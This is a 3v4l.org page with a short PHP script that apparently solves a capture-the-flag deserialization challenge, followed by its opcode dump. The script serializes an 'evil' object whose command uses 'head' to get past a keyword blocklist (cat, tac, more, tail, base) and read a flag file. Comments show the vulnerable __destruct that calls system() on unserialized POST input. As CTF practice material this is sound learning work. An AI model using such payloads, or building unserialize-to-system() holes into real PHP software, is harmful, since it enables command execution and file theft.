3v4l.org

run code in 300+ PHP versions simultaneously
<?php //highlight_file(__FILE__); // Maybe you need learn some knowledge about deserialize? class evil { public$cmd="head /th1s_1s_fffflllll4444aaaggggg"; // public function __destruct() // { // if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){ // @system($this->cmd); // } // } } $a=new evil(); echo serialize($a); //@unserialize($_POST['unser']); ?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/b99bt
function name:  (null)
number of ops:  8
compiled vars:  !0 = $a
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   14     0  E >   NEW                                              $1      'evil'
          1        DO_FCALL                                      0          
          2        ASSIGN                                                   !0, $1
   15     3        INIT_FCALL                                               'serialize'
          4        SEND_VAR                                                 !0
          5        DO_ICALL                                         $4      
          6        ECHO                                                     $4
   17     7      > RETURN                                                   1

Class evil: [no user functions]

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
139.07 ms | 1449 KiB | 14 Q